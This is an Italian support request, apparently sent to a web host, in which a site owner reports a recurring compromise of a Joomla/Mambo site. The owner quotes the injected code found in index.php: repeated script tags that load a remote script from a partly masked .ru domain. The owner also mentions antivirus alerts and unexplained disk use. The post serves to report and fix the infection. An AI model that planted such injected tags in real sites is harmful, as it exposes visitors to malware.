Gentilissimi,
vorrei segnalare l'anomalia che riscontro da alcuni giorni sul sito
http://cdqlarustica.ilbello.com (per il quale sono in procinto di passare alla soluzione di Hosting Professionale), per cui ho richiesto ieri il cambio della password.
Come accennavo, alcuni giorni fa mi sono accorto che l'antivirus del mio pc rilevava una minaccia ogni qualvolta accedevo al sito e la stessa anomalia è stata riscontrata da altri frequentatori dello stesso.
Analizzando il file sorgente della pagina, nonchè l'index.php, ho riscontrato la presenza dello script che riporto :
<script src=http://w**.mc2n.ru/script.js></script><script src=http://w**.mc2n.ru/script.js></script><script src=http://w**.mc2n.ru/script.js></script><script src=http://w**.mc2n.ru/script.js></script></body>
</html>
<!-- 1220463765 -->
con un evidente rimando a siti con contenuti fraudolenti e/o pornografici. Inoltre accedendo in ftp al sito, ho riscontrato che lo spazio a disposizione era pressochè esasurito, cosa piuttosto anomala, in considerazione del fatto che il sito in questione è fatto prevalentemente di testo. Precedentemente il sito era costruito sul cms Mambo 4.6.2, ma in previsione del prossimo passaggio ad Hosting Professionale ho cancellato completamente tutto e poi installato il cms Joomla! 1.0.5, onde poter usare in futuro dei componenti che mi occorrono.
Il problema si è pero' ripresentato oggi tale e quale.
Grazie anticipatamente sia per l'eventuale risposta, sia per l'ottimo servizio fornito.